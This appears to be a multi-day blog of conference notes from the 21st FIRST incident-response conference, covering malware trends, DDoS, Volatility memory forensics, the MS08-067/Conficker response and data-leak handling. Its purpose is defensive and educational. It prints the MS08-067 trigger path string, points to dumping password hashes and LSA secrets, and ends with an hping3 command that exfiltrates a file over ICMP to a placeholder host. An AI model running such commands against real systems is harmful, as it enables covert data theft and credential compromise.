21st FIRST Conference – Day 5

Today is the last day of the conference. It’s been great so far, but it’s not over yet

09:00 Security and the younger generation – Ray Stanton

This is the first time in history that many countries have 4 generations of people working alongside each other.

Who are the younger generation ?

• Language
• Culture
• Demands
• Speed of learning
• Expectations
• Pushing the boundaries

Generation Y (refers to a specific group of people born between 1982-2000). The majority of Gen Y spent a significant amount of time leading an online lifestyle.

Gen Y statistics (Junco and Mastrodicasa Study 2007)

• 97% own a computer
• 94% own a mobile
• 76% use Instant Messenger (15% logged in 24/7)
• 34% use websites as their primary source of news
• 28% author a blog and 44% read blogs
• 49% download music using peer-to.peer file sharing
• 75% of college students have a Facebook account
• 60% own some type of portable music and/or video device such as an iPod

Companies must make their security policies relevant to Gen Y. Language that is easily understood and interpreted by Gen X, is interpreted differently by the newer generation.

Gen X are fast at adopting the new technologies (they are also the largest group), however Gen Y are the ones the push the boundaries and innovate.

Find ways to make it work

• Moodles – styles of eduction
• Listen
• Engage
• Never, ever, say No! They will just go around you
  
• Participate
• Embrace

10:15 Conficker Research project – Aaron Kaplan (CERT.AT)

The guys from Cert.at gave a nice graphic geographical representation of infection rates of conficker using a google earth overlay.

By looking at the the scale of infections over time it was possible to create an animation showing the  clean-up process in various countries around the world. To of the list of infections were China, Brazil, and Russia

11.00 Show me the evil: A graphical look at online crime - Dave Deitrich (Team Cymru)

Bad neighborhoods (most infected systems) – China, US, German and Brazil are top. However these are the locations with the largest number of online users. When looking as a percentage of online users, these countries are way down on the list.

Charts of infections by IP-ranges and statistical information available on Team Cymru’s website.

Concentration of bot-net controllers in more developed regions – US, Germany, Korea

When tracking bot activity (conficker) the number of bots reporting in dips on a Sunday due to systems in companies being powered off. The time of systems reporting in also supported this assumption as most bots where reporting in within working hours (depending on the region of the bot)

DDoS tracking showed the targets in US and Europe were most popular. However everybody is effected as service providers spread the cost of DDoS protection between all of it’s customers.

Lack of data collection in areas such as Africa is a problem when forming statistics. If more data was available then a completer picture could be put together.

11:30 Internet Analysis System (IAS): Module of the German IT early Warning System – Martin Bierwirth/Andre Vorbach

Designed as part of a project to protect critical infrastructure. Passive sensors are located at partner sites and provide information (filtered and anonymous) on network traffic. These partners are most in government networks, but are also installed in other partner networks.

Every five minutes a sensor transmits about 560kb of data

IAS data privacy

• Does not monitor data with personal reference
• Does not reassemble TCP flows
• Independent of IDS systems
• Revoke context of a packet after building it’s counter

Manual research on the data is done through a program developed in co-ordination with German universities. Tracking of outbound HTTP traffic get-requests allowed BSI to check the agent strings and confirm that users are not using insecure versions of software like Firefox. Charting showed versions from 1.0 through to the latest (at the time of data) 3.0x version.

IAS gives data to be able to ask the right questions. By using profiling it is possible to automatically identify traffic patterns that are out of the norm for the network.

Example: DNS spike of traffic across 3 separate networks. By looking at the traffic it appeared to be a large number of spoofed DNS requests for the “.” record. Source IP-Addresses were spoofed. It was discovered that the 3 networks were being used as part of a reflective DDoS attack. By tracking across multiple partners it is easier to see when attacks are targeted. When monitoring government networks it is easy to think that all attacks are targeted ones.

Aggregated data extends the perspective of individual networks.

Prospects: Deploy more sensors, Automatic correlation of data

13:30 New Developments on Brazilian Phishing Malware – Jacomo Piccolini

Changes from 2008 to 2009

Malware levels have remained around the same. 30-40,000 unique per year. Although the amount has remained constant, the quality has increased. Less usage of Delphi, Visual Basic in programming. Move towards Java / C++.

Targeted attacks are rare. Most attacks spread through the use of spam email giving links to users (themed attacks).

Many malware samples are using simple attacks that alter the local hosts file to redirect victims to phishing sites (password stealing, etc…). This is not rocket science. Keep it simple. Most examples concentrate on adding hosts entries for Brazilian banks.

InfoSEG

Attacks against government information systems using malware. Access to the Brazilian database gives you access to all information on a citizen (car registration, job information, income, Tax information, travel permits, Visas, family ties, personal information, arrest history, picture, gun permit information, signature, etc…). The malware uses a simple overlay to steal the logon for a user. These logons were on sale on the streets of Sao Paulo, Brazil for $1000.

This information was covered in the media in Brazil. I can’t find the footage in English, however the original is available on youtube.

Newer malware used to install a BHO (Browser Helper Object). This then routes all your traffic through a single proxy when the traffic meets specific criteria (in most cases access to bank websites). The proxy would then re-direct to another phishing server to steal the credentials. When this malware was run through virustotal, no AV vendor discovered it.

Stronger focus on malware. Blocking access to documents, pictures and a range of other files. The machine then warned the user to use a specific AV to clean the system. For $10 you can then buy the AV product (scam product) to regain access to your files. Low cost extortion. The malware locks the files through “GetActiveWindow” call to block the applications. All files are still present. If you copy the file off to another machine then they are all available again.

DNS cache poisoning is also still an issue. On 11th April 2009 one of the biggest banks in Brazil suffered a dns poisoning and redirected traffic to a phishing site. This issue was resolved in 7 hours (it was on a Sunday).

Brazilian Initiatives

Defensive Line website (www.linhadefensiva.org) –> community blog that deals with end-user infections. Acts as a CSIRT team (ARIS-LD) and also provides anti-malware tool (bankerfix). This team is looking for assistance in developing their new software solution. Please check the website if you can assist them.

Malware partol (www.malwarepatrol.net)–> Provides blocking lists to many applications (mta, proxy, dns…). These are updated on an hourly basis and made available for any purpose. Some files tracked by Andre are still online after 4 years of tracking them.

Federal Police: Operation Trilha –> 691 law enforcement agents, 139 arrest warrants, 136 search warrants, 12 Brazilian states (28 cities), in addition to arrests in Brazil, 1 arrest was made in the US.

Malware is an alternative source of income and for some “just a job” – social issue

My take from this presentation is that the Brazilian malware economy is very internally focused. Brazilians targeting specifically other Brazilians and Brazilian banks in particular. This is something to watch in the future however, as the malware authors become more proficient they are beginning to branch out into other markets.

FIN
Overall the FIRST conference was a great experience and gave me a different perspective than my normal conferences (mostly hacker style cons like CCC, Blackhet, etc…). The fact it was in Japan just adds to the overall effect of course. I wish I had more time to look around and really take in the culture. Hopefully I can arrange some time next year to make a long tour of Japan with my lovely girlfriend. I’m accepting donations Here’s to next years FIRST conference in Miami.

21st FIRST Conference – Day 4

Today’s a short day due to the AGM taking place this afternoon. I’m hoping to make the most of the time and visit the Kyoto Imperial Palace or the craft market. Still, you never know what’ll happen here.

09:00 A Railway Operator’s Perspective on the lessons of the Great Hanshin-Awaji Earthquake – Takayuki Sasaki

Mr Saskaki (from JR West Railways) talked about how to manage an unexpected disaster recovery situation. The earthquake hit 7.3 on the Richter scale and caused in excess of 10 Trillion Yen in damages. 6433 people lost their lives in the disaster.

3 rival railway companies (JR West, Hankyu, and Hanshin) teamed to ensure that passengers were able to travel easily.

Crisis control methods put in place after the earthquake .:

• Introduction of urgent earthquake detection and alarm system
• Anti-seismic reinforcement work
• Establishment of a second Shinkansen General Control Center

11:00 In The Cloud Security – Greg Day

Estimated in excess of $1trillion loss through cybercrime and data loss in 2008.

Q1 2009 – 12 million new IP’s zombied since January –> 50% increase since 2008

Koobface – more than 800 new variants in March 2009

In 1990 Dr Solomon’s Antivirus had signatures for 296 viruses (+61 variants). Wouldn’t it be nice to go back to those days.

Historically AV has been designed to protect against single large threats. The new method is much more smaller viruses and variants designed to be re-wrapped and re-used over and over again.

How the virus landscape has change .:

• 1987-2000 “Method” –> Viruses were all about proving that it was possible. Viruses were slow and not released often.
• 2000-2003 “Speed”–> Speed of spread was the key. These viruses could be seen just by looking at the backbone and seeing the increase in traffic.
• 2004-xxxx “Volume” –> The idea of hitting a target with many different variants until one bypassed your defenses.

Proactive behavioral controls work by examining processes to form a baseline of their memory usage and data-flows. If larger amounts of data are seen that would cause a buffer-overflow, then an alarm is triggered. Even in a standard environment it’s not easy to implement a complete lockdown of the system using this technique. This means that reaching a mid-point between the newer techniques and the older style signature and change control checks (monitoring registry changes, etc…).

The huge increase in malware in recent years has been caused by the move away from smart people writing and using malware. The people capable of writing the malware are now moving to a better business model were they sell the tools for creation of a virus/malware. Tools such as Shark can create many combinations of malware depending on the settings selected, and packers used. This lowers the level of entry that anybody can have customized malware.

** 30 minutes in…. first mention of cloud (yes, he really did use the Final Fantasy character in his presentation)

The cloud can be used to increase the response times by returning metadata on files seen in order to track possible malicious traits. This information is sent up to the servers and compared to other gathered data. The existing DNS protocol is used to transfer the metadata to the server and respond. If the suspicious file is know to the AV vendor then they can alert you through a DNS response (signed and encrypted). All data sent is anonymous.

In the case of targeted attacks, the aggregation point in the cloud is used to map the fingerprint of possible attacks. Artemis clients sent fingerprints ~2 hours before samples are received.

The trend has moved away from self-replicating malware and moved more to self-infecting (user infects themselves by visiting a website)

Using fingerprinting it’s also possible to recognise sites that are infected with hidden iframes and develop blacklists on the fly from information gathered from all users. Once a threat fingerprint has been identified, it can be detected on any site that has been infected using the same method/injection. This same scenario can also be used with message reputation to improve existing spam mail filtering.

www.trustedsource.org –> Gives an overview of the data seen from these initiatives

Problem of gathering more intelligence. Most customers request more intelligence on what is currently being seen, however are not happy to be one of the sources to privide information. This has hopefully been resolved by restricting the information sent to hashes of what is seen, and not files or other identifiable information.

13:30 Chinese Hacker Community and Culture, Underground Malware Industry – Zhao Wai (KnownSec)

Part 1: Chinese hacker culture
Part 2: Underground industry
Part 3: How do we fight back ?

Trends (Blackhats and Whitehats)

• 1998-2003 : Server-Side
• 2002-2007 : Client-Side (Image format, Office documents, IE)
• 2006 – xxxx : 3rd Party –> For Profit

3rd Party applications are very weak on security and full of bugs.

Sometimes legitimate security researchers in China have their research accidentally released or used in attacks. This is because of other hacking groups attacking the researchers networks, or the researchers selling the exploits through untrustworthy services.

Blackhats in China

• Age: Young (maybe not), Talented, and rich
• Most are not in big cities
  • Why? Economic related ?
  • More fired engineers – more hackers ?
• Blackhat Culture: Baidu zhidao forum, QQ (Chinese social networking)
• Underground industry: everybody has a role
• Not using IRC anymore. More often on public forums or QQ
• International ? Not yet ?

There are currently 300 Million internet users in China. People in China are scared to use e-commerce websites due to fear of being hacked and having their information stolen. Malware is not only written in China, but is also a problem for users in China.

China is not only the world’s factory, but also the world’s malware factory.

New Kanji and phrases have been created in the last few years to describe malware functions. (e.g. GuaMa: Hooking Horse,Injecting malcode into websites)

Many different teams are involved in the malware process. Seperate teams deal with the exploitation, sales, and various other parts of the process.

In 2006/2007 a majority of malware used known vulnerabilities in 3rd party applications. Currently 0-day attack code is used in various 3rd party products. The recent malware versions like to exploit logic bugs (Baidu toolbar, snapshot).

0-day market underground

• They love client-side vulnerabilities
  • Easier to find
• Price is better than ZDI
  • Researchers still prefer ZDI
• Sometimes 0-days are leaked to the market
  • Security professionals
  • Professional whitehats

The KnownSec team talked last year at Xkungfoo(xcon) about the SNS worm plus drive-by download attacks. This year there is a worm spreading through the QQ social network.

The KnownSec team are trying to crawl Chinese websites to find and label the malicious websites. However they’re not google. More water vapour than cloud computing. Easy to DDoS. It was found that a majority of the malicous servers are located in a small area of China. Some large areas have no malicious servers at all. Within China .com domains account for 52% of the malicious domains (followed closely by .cn with 32%). The team download around 858 downloaders per day. Of these 16% are brand new. The average detection rate of these downloaders on VT is 60%. In tests McAfee-GW-Edition, AntiVir and eSafe find the most samples. ClamAV finds only 10% of the samples. 50% of the malicious websites are not found by the Google safe browsing filters.

Some information on these figures can be found on the KnownSec website.

This research has been used to create a better filtering and protection engine. Webmon API –> Currently in private BETA

Day 4 was a littler shorter than the others, but it means I might finally get some sleep. I should be over my jet-lag by the time I get to fly home I’m sure

21st FIRST Conference – Day 3

Today’s big thing is the Volatility training from Andreas Schuster. I’ll be trying to attend some talks after the workshop is over were possible.

09:00 Attacks Against the Cloud: Combating Denial-of-Service – Jose Nazario

Cisco anticipates that 90% of bandwidth usage will eventually be used for video services. Historically the Internet has been a nice to have. As services such as communications move to the Internet it becomes a need to have. Availability and quality of service becomes more of a serious issue. Telephony services are a key point. People need to communicate, especially in the event of an emergency. 911 emergency services need to be available all the time.

The generic definition of the cloud – “If somebody elses stuff breaks, your business grinds to a halt”

Internet attack sizes have grown from 200Mbps in 1999 (based on code-red traffic levels) to 50 Gbps in 2009. The trend appears to be a doubling of attack bandwidth year on year.

Historical effects of Denial of Service attacks

• 1999 –> Routers die under forwarding load
• 2002 –> Servers die under load
• 2005 –> Renewed targets in infrastructure (DNS, peering points)
• 2008 –> Web services

Service providers are now able to cope with the attack traffic. In turn this has caused the problem to move on to the customer. With the event of caching servers and load balancers the attackers have moved to use methods designed overload backend servers with hard to resolve requests. This bypasses the protections put in place in most organisations.

The change of Denial of Service from fun to criminal

• 1999 –> IRC wars to lead to widespread adoption of primative DoS/DDoS tools
• 2001 –> Worms: Code Red, Nimda, SQL Slammer
• 2004 –> Rise of the IRC botnets: Online attacks go criminal
• 2007 –> Estonia attacks cause governments around the world to worry about cyberwar
• 2009 –> Iran election results lead to DDoS, Twitter, etc…

Providers have responded by protecting their own infrastructure and using manual blackhole routing as a protection measure (2001). Providers then start to offer DoS protection as a service to customers using BGP injections (2003). Finally providers begin protecting key converged services such as VoIP and IPTV using multi-GBbps inline filtering (2007).

09:30 I am a Kanji: Understanding security one character at a time – Kurt Sauer

Teaching somebody about security is not unlike teaching somebody how to understand Japanese kanji. There are around 50,000 kanji, and they can have multiple definitions. Not an easy task.

Great presentation. I’d suggest looking at the slides/video to get the full effect. Nothing ground breaking, but definitely worth the time.

11:00 Windows Memory Forensics with Volatility – Andreas Schuster

Like yesterday, this is more of a workshop than a presentation. I’ll post up any links / information that might be useful however. You can find the slides and workshop information (along with other good information) on Andreas’ blog

Part 1: Refresher – Memory Fundamentals, acquisition, kernel objects, analysis techniques
Part 2: Using Volatility – Volatility Overview, analysis w/ Volatility
Part 3: Programming – Developing plug-ins for volatility

PART 1: Refresher

Live Response

• Focus on “time”
• Acquisition and analysis in one step
  • Untrusted environment
  • Not repeatable
• Tools tend to be obtrusive

Research from Aaron Walters and Patroni (2006) that details the percentage of RAM changed when a system is in idle state and during a memory dump –> Blackhat DC presentation from 2007 details this information. Research shows that 90% of freed process objects are still available after 24 hours of idle activity.

Focus of live response is on Main memory, Network status and Processes. When performing memory acquisition, Installing agents prior to the incident can help to minimize the impact.

Expert Witness Format – Used primarily by Encase. libewf project – Joachim Metz (http://sourceforge.net/projects/libewf/)

“powercfg /hibernate on” –> Enables hibernate from the command-line on Windows systems. More information on the powercfg command can be found on Microsoft Technet.

Basic memory analysis: piping memory through strings and looking at interesting results. –> Remember to set ASCII/ANSI and UNICODE

• Many false positives
• Memory is fragmented
• Conclusions hard to form (hard to prove connections between strings, discoveries might be mis-leading)
• Obfuscation

List walking: Find initial pointer and traverse the doubly linked process list –> Applies to single lists and trees

• Easy to subvert (anti-forensics)

Scanning: Define signature and scan the entire memory for a match

• Slow
• OS dependant (patches can break things)

There are also a number of hybrid methods used.

PART 2: Using Volatility

Originally developed in 2006 as a tool called FATkit. This was then used as the basis for VolaTools in 2007. The VolaTools project was transferred to Microsoft through a company buyout. The project was restarted and completely reprogrammed at  an open-source project – Volatility

SVN version is available from http.//code.google.com/p/volatility/

Standard options for Volatility are .:

-h, –help            show this help message and exit
-f FILENAME, –file=FILENAME (required) XP SP2 Image file
-b BASE, –base=BASE  (optional, otherwise best guess is made) Physical offset (in hex) of directory table base
-t TYPE, –type=TYPE  (optional, default=”auto”) Identify the image type (pae, nopae, auto)

For help on specific functions, volatility <function_name> -h

http://www.forensicswiki.org/wiki/List_of_Volatility_Plugins contains a list of published plug-ins for the framework

A number of functions within Volatility have been updated to improve speed and reliability. An example of this is the thrdscan/thrdscan2 function. The updated versions usually run faster than the original versions. It may be best to check the output between the older/newer versions to ensure that you are receiving consistent output and not any false positives/negatives.

volatility modules -f <memory_dump> –> outputs a list of loaded modules (driver files). The modscan2 function will give a more comprehensive list of loaded (and previously loaded) modules (if the metadata is still present in memory). The moddump function can be used to extract a module from the memory dump for further analysis.

Using scanning modules is very helpful as it will reveal information on not only what was loaded at the time of the memory dump, but also scan the entire memory for any matching signatures of what may have been loaded/unloaded prior to the dump. This is the case for not only modules, but also processes as well.

The pstree plug-in is useful to output a process tree (ASCII style).

However not all processes are listed. By using pcscan2 with the “-d > output.file” option you can create a file that can be opened in ZGRViewer. This shows a full graphical output of the process list including start and end-time of each process. ZGRViewer also offers very helpful search functionality to help find processes within the tree.

By finding the PID of a process you can then use the files, and dlllist to find the open files for the process in question. By running getsids you can examine what account started the process, as well as information on if it was interactive or not. You can also use the regobjkeys to examine what was in use within the registry by each PID. By running the procdump function (with the PID of the suspicious executable) you can extract the process into a file for further examination.

Examine open connections and sockets is also simple. Volatility has the connections function (along with connscan/connscan2) and the sockets function (along with sockscan/sockscan2). These functions will output the PID of the creating process so it can be mapped back to processes discovered in the process listing performed earlier. As with a majority of the scanning functions, they may find information on sockets/connections that existed, but were no longer open when the memory dump was performed.

As part of the VolReg plug-in you can also output things like the LSA secrets, as well as password hashes. These rely on information form the hivescan/hivelist functions. Performing the hashdump is something that’s been covered before on various blogs. If you want a rundown of how to perform a complete dump of password hashes, I’d suggest checking out Chris Gates’ post on the carnal0wnage blog, or the forensiczone walkthrough.

Some interesting plug-ins to explore –> cryptscan (to search memory for Truecrypt passwords), malfind (to search for possible injected code), dmp2raw/raw2dmp (for converting formats — Crash Dump format).

This was a great workshop. I’d love to have spent longer going through things. However the point was to demonstrate how to use the Volatility tool and not to teach n00bs like me how to do proper analysis. I’ll have to take the time to run through the examples and slides again to really get to know the process fully.

16:00 Incident Response and Voice for Voice services Lee Sutterfield

Protection of dedicated VoIP services by using a specifically designed Voice Firewall alongside existing firewall technologies. Unlike a normal IP-based firewall, a Voice Firewall is designed to restrict the actions of a user within the policy of the organisation. This includes restrictions such as limiting the destination of dialling from specific extensions (block long distance, international), limit on the time and duration of calls. It also offers the ability to restrict incoming calls to prevent access to dial-up services from unwanted numbers. This can be implemented to prevent war-dialling attacks by restricting based on the source of the call and pattern of inbound calls.

A Voice Firewall is primarily designed to prevent things like toll fraud instead of defending the system from attack. It also offers better visibility into the usage of your voice network and provides alerts when certain trigger levels are exceeded.

Another usage of Voice Firewalls is blocking calls to prevent crank calls, or active war-dialling attempts. Any calls from this number are then blocked and the attempt is logged. Using this technology it is possible to protect against / log attempts of vishing attacks.

Voice Firewalls can be used to assist with the following security points .:

• Unauthorised modems
• Remote access (modem) attacks
• Phone service misuse
• Toll fraud
• Harassing/Threatening calls
• Malicious software (triggering calls to pay numbers)
• Vishing attacks
• Denial of Service (against VoIP services)
• Bomb threats (call  recording)
• Improve voice uptime
• Stop data leakage
• Reduce telecom total cost
• Baseline/plan/optimize (new VoIP deployments)
• Policy driven call recording

Voice Firewall technology address age old vulnerabilities and lock-down mechanisms. This increases your ability to provide improved incident response and preventative services to the enterprise as well as via Managed Security Services for Voice (MSSVs).

Well we”ve hit the mid-point of the conference. It’s been great so far. Tonight we have the FIRST conference banquet. Hope they have sushi else there might be a riot

21st FIRST Conference – Day 2

I’m still not over the jet-lag, but still, day 2 of FIRST rages on. The pre-conference talk started with the announcement that Interpol have been accepted as an official FIRST member. The winners of the best practices contest (this years focus was on detection of attacks) were announced, with CISCO CSIRT taking the award with a paper on Netflow (the papers should be available on the FIRST website later today). Second place was awarded to CERT-FI.

DAY 2

09:00 Reconceptualizing Security – Bruce Schneier

Thinking about what security and risk means and how we deal with it. Security by definition involves human beings. We need to define how people think about security. You can have security without actually feeling secure. You can feel secure when you’re not. These are 2 different things. A separation should be made between the feeling of security and the reality of security.

Security is a trade-off. Giving up something in order to gain a degree of security. However what is given up needs to worth the trade-off. Whether or not something is worth it comes down to a personal choice. People have a natural intuition when it comes to security. Although humans are on one hand good at evaluating their security, they can also sometimes be very bad. This is what drove Bruce to research the “The Psychology of Security“.

Humans are built to make quick decisions. Getting the good answer fast is better than getting the best answer slow.

Humans rationalise the familiar as more secure than unfamiliar. People are afraid to fly, yet are happy to drive, although the risk is higher. 42,000 people die every year in the US from car accidents. This figure is much higher than plane accidents. Humans overreact to rare risks more than risks we accept everyday. We
will be more likely to stop doing something if a close friend is
effected than if many many people who we don’t know are effected.

The economic incentive is to make people feel secure. However the feeling and reality don’t always match.

Discussion of the various mental models based on experience, press, government, industry and human feelings. Humans are better at focusing on risks that are in the short-term, and are very bad at realising risk that is far off.

Security decisions are often made for reasons with nothing to do with security. The person making the decision will manipulate the model based on their view of reality and their requirements. Stakeholders will try to convince others that their views are correct.

If you believe something, then evidence against that belief will often be ignored, were positive evidence will reinforce that belief.

Flashbulb moments that change peoples mental models – 9/11 Terrorist attacks and the JFK assassination are examples of US flashbulb moments. Each culture has their own.

Change happens slows. Even easy changes such as changing peoples smoking habits have taken decades. People are quick to reject new models if they don’t agree with our feelings. Our feeling on global warming (what we see in-front of us) doesn’t always agree with the new scientific model of what will happen.

Security reality and security feeling should be balanced. If people feel insecure they will not trust the technology, if they feel too secure they will be at risk.

All effort is put into feeling secure. Some part of that however spills over into the reality of being secure. Some things that are implemented to increase the feeling of security in-fact lower the reality of security.

Building a surveillence infrastructure makes us less secure.

Economics doesn’t support security and reliability. Features are the main driving force in technology.

11.00 Network Monitoring Special interest group: Monitoring & Analyzing Client-side Attacks

This special interest group was in the form of a workshop.

You can download the vmware image (Debian), PDFs and PCAP files used in the workshop – HERE.

The demos focus on client-side / drive-by downloads using examples for fast-flux and non-fast-flux style attacks. The workshop uses a downloadable Debian VM with some self developed tools (based on Rhino).

I opted to skip the afternoon section of the workshop. I’ll work on the exercises on the plane home

13:30 Comprehensive Response: A Bird’s eye view of Microsoft Critical Security Update MS08-067 – Microsoft

Microsoft Security Response Center / Microsoft Malware Protection Center give an overview of Microsoft’s response to the MS08-067 vulnerability and the rise of conficker.

The MSRC has 3 main areas of responsibility .:

• Investigate and Resolve Vulnerability Reports
• Microsoft Security Response Process
• Building Relationships and Communications

When releasing a security update Microsoft follow a dual track to manage and deal with the patching process

1. Vulnerability Reporting
2. Triaging
3. Managing Finder Relationship
4. Content Creation
5. Release

In tandem with the above process (at steps 2-4), a technical fix is developed and tested.

1. …
2. Creating the Fix
3. Testing
4. Update Dev Tools and Practices
5. …

A lot of effort is put into the testing phase to ensure that the patch deals with the issue, doesn’t create other issues (security or non-security related), and is compatible with other products.

Microsoft release day means staff getting in at 6am to monitor the process and make sure everything runs smoothly.

MS08-067 (October 2008)

• Vulnerability found in Windows Server Service (netapi32.dll)
• Wormable
• Large install base
• Exploit and limited attacks known; widespread malware probable

This vulnerability was discovered through the customer support services department. A specific crash was reported by a customer who was experiencing issues. Originally though to be another attack attempt against the flaw originally patched in MS08-040. During further research it was found to be a seperate vulnerability.

The vulnerable function is the ConvertPathMacros function

• Exposed via anonymous RPC endpoint
• Replaces path macros (\– and \)
  • Normal usage \foo\bar\..\bas -> \foo\bas
  • Normal usage \foo\bar\.\bas -> \foo\bas
• Vulnerable usage \a\..\..\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

This attack string forces the ConvertPathMacros to look back into the stack for the previous slash. Some pre-staging of the atack must be made to trigger the exploit.

By using fuzzing it was possible to trigger the vulnerability and search for possible varriations of the attack. Microsoft didn’t want to fix netapi32.dll again (after already fixing it in MS06-040 and MS06-070). So all cases were tested to make sure it was done right.

MAPP partners were provided with packet captures, safe PoC, technical description, information about the malware currently exploiting the vulnerability, stack traces.

Through the security bulletin customers were given workarounds – Block SMB, Stop services, Vista\WS08 RPC firewall rule to block UUID, Chacl tool to change named pipe ACL

Response Timeline .:

Oct 6th – Received notification of vulnerability
Oct 6th – Reproduced vulnerability on reported platform (XP SP2)
Oct 6th-10th – Begin testing other effected platforms
Oct 10th-22nd – Fix developed and core baseline of testing completed (due to out-of-band release)
Oct 23rd – Patch pushed out through all update platforms (WSUS, Windows Updates, etc…)

The process of releasing this patch was compressed from a 2 month process into a 17 day process due to the severity. Despite this work, customers complained about the patch coming out-of-band. Microsoft rarely release out-of-band patches (In 2008 Microsoft only released 2 out-of-band patches).

Analysis showed that malware was exploiting this flaw beginning on 13/08/2008 – These were targeted attacks designed to drop TrojanSpy:Win32/Gimmiv onto the system. Data was then collected and sent to a server in Japan. Detection for Gimmiv was added into the MSRT tool in November.

After the patch was released more trojans began to use the exploit (Trojan:Win32/Wecorl, Trojan:Win32/Clort). The first worm using this exploit (Conficker) was seen on 21st November. The code used in Conficker didn’t appear to be linked to the earlier team who developed Wecorl/Clort.

The name Conficker was from a string found while Microsoft analyzed the original variant (Traffic-converter.biz).

Conficker B was less about exploiting vulnerabilities and more about testing company best practices (weak passwords, autorun, local administrative permissions, etc…)

Comparison between the various versions of Conficker.

• Variant A – Spread only through the MS08-067 exploit
• Variant B – Began to brute-force network shares, infecting network/removable drives, and using scheduled tasks to run the worm on remote machines.
• Variant C – No new infection methods – Added P²P communications
• Variant D – No infection required – distributed as an update to previously infected systems (B and C variants)
• Variant E – No infection required – distributed as an update to previously infected systems (B, C and D variants)

It’s impossible for one vendor to do everything alone. Collaboration across the industry is vital in fighting people who distribute malware.

Around 100 people at Microsoft worked on the MS08-067 / Conficker problem between all phases of the incident. This raises an issue of scalability. If multiple issues like Conficker hit at the same time, then there may be problems handling the load (as yet untested).

16:00 INTERPOL Initiatives to Enhance Cyber Security – Vincent Danjean

Interpol was created in 1923 and is the worlds largest international police organisation with 187 member countries.

There were a lot of statics and information presented on success stories. I’d suggest taking a look at the slides as there is very little point in me reprinting the statistics and facts. The information is a little dry however. So you have been warned

Well that the end of day 2. It’s been another long day. time for that beer…

I managed to have a long chat with Sherri Davidoff and Johnathon Ham today after the client-side attack workshop. Johnathon managed to finish the first exercise within a few minutes while most of us were still looking for the right PCAP file. His strategy for the analysis was so straight forward, but very effective for quick analysis of captures. I always enjoy talking to people smarter than me (it happens a lot) as I get learn something new. I’m looking forward to Sherri’s talk at Defcon as well. It sounds like it’ll be really interesting.

Tonight is the vendor showcase. Normally I shy away from that kind of marketing event, but they have beer Tomorrow I’ll be attending the volatility workshop held by Andreas Schuster (it’s going to be a day of fun playing in memory). So the blog might be a littler short tomorrow. Maybe that’s a good thing though. I talk too much…

21st FIRST Conference – Day 1

Well I’m finally over my jet-lag, ok, almost over my jet-lag, and day 1 of the 21st FIRST conference is just about complete. I managed to hit a few interesting talks today. Not all of them were public information, but I’ve written up some notes from the ones that were for your enjoyment. Short note, this isn’t a high-tech conference like Blackhat, so if you think the information is a little high-level, then you’ll understand why. The focus of the conference is more in Incident Response and Handling, than my usual attack vectors stuff, but so far it’s been  a great experience. Hope you enjoy the write-up.

DAY 1

09:00 Information Security Management and Economic Crisis – Suguru Yamaguchi

I know that keynotes are usually meant to be dry and a little bit boring (sorry, but you can’t sugar coat the truth), however I decided to risk it and pop in to see what was on offer. It seems that nobody told Mr Yamaguchi that he was meant to be boring, which made for a bit of a surprise. After a quick guide to what to see in Kyoto (along with shopping tips) and some historical information about Japan (any why the food was much better here in Kyoto than in Tokyo) the talk moved into the more serious side of risk management in the current economic climate. The topics covered were varied, so stay with me if it seems a little chaotic.

Economic Crisis / time of “less”

The initial focus was on the use of technology in Japan to automate and streamline services such as speed/control systems used in the Japanese bullet trains, management of the Tokyo underground network, RFID for stock tracking/distribution management (to automate shipping of stock to locations depending on demand) and water control/flow management. The use of technology is also now working it’s way into smaller businesses such as taxi services (using TCP/IP connected terminals in the cabs to transmit requests and improve management of services). IT is now a vital component of all businesses, not just large multi-nationals, but also the smaller businesses are becoming more reliant on these systems for everyday business purposes.

“perimeter protection model” doesn’t work anymore

With the increase in outsourcing, ASP, SaaS and cloud computing the perimeter is much more fluid and undefined. Services are now from entities in other countries. Different rules, laws and standards.

Risks have changed dramatically

• Quality and Quantity of “attacks”
• Economic damages
• Who is attacking / being attacked

“Public Private Partnership” –> Government policy to encourage knowledge sharing across business domains (especially critical infrastructure)

Main goals set in 2006 (in Japan), new goals to be reviewed in 2009 .:

• More preparedness
• More scientific approach
• Share risk between business and government

The economic crisis have caused costs to be cut in various ways. Less investment in information systems (including information security management). Slow down of innovations, upgrades and improvements. As the headcount lowers, companies are unable to innovate and adapt as easily as before.

Mission impossible for system operators. Lower budgets, less staff and increase in security incidents (rise in data loss/theft issues). Cost savings and security assistance can be achieved through the use of virtualization and BYO (Bring Your Own) laptop schemes. BYO – Using personal laptops for business uses. Based on virtualization or thin-client solutions. Reduces costs and can help improve security.

Real-time 3D visualization by Nicter (Network Incident analysis Center for Tactical Emergency Response)

Use of visualization in comparing attack traffic to normal traffic. By using this technique it is easy to see portscans, DoS attempts and a variety of other attack types visually and in real-time. Helps to streamline information management in a time when less needs to do more.

Invisible computers a growing risk. Electronics that are not traditional computers, but operate on the TCP/IP networks (HD-Recorders, Set-Top boxes, etc….) These systems are more vulnerable and open to abuse. Attacks routed through these devices have started to be seen in the wild in Japan.

13:30 Proprietary data leaks: Response and Recovery – Sherri Davidoff / Johnathon Ham

Scenario: Attacker has physical access

Attacker Profile: Staff member, cleaning staff, security guards, etc…

Spybase Wireless Keylogger ($285 Amazon)

• Install once and access through wireless to download the data
• Staff are unaware/untrained on what to check for on a system to check for a keylogger

Questions to ask in a response scenario

• How long has the keylogger been installed ?
• Who planted it ?
• What information has been exposed ?
• What other systems could be exposed ?

Keyloggers have serial numbers, many manufacturers will provide information on sales to law enforcement in the event of an incident. Track other systems that have had the same device installed. Often the attacker has tested it on his/her own machine first. If this is an internal staff member, then this may be a source of information.

USB devices come in many different formats. Pens, wristbands, iPods, Sushi (yes as seen in Johnny Long’s presentation), and many different places to hide things like micro-SD. Ironkey have a professional USB that supports remote wipe. If you recover this kind of USB in an incident response, store in a suitable bag to block incoming wipe commands.

Sherri performed a live demo that demonstrated how easy it is to download data from a system to a phone connected through USB. By using encryption and deleting the key after encryption it is possible to prevent a responder identifying what data was copied.

In physical access cases .:

• Monitor account/system usage
• Preserve evidence / chain of custody
• Determine type of affected data
• Contact legal advisers
• Lockout / monitor (depending on situation)
• Identify systems that could also be exposed

Scenario: Attacker Logical Access

Use of convert channels to ex-filtrate the data without triggering defenses

Examples of covert channels :

• ICMP Echo Request Tunneling (Loki)
  • Implemented using HPING3 -E secret.xls -1 -u -d 1024 nonexistent.domain.com
  • Capture using TCPDUMP

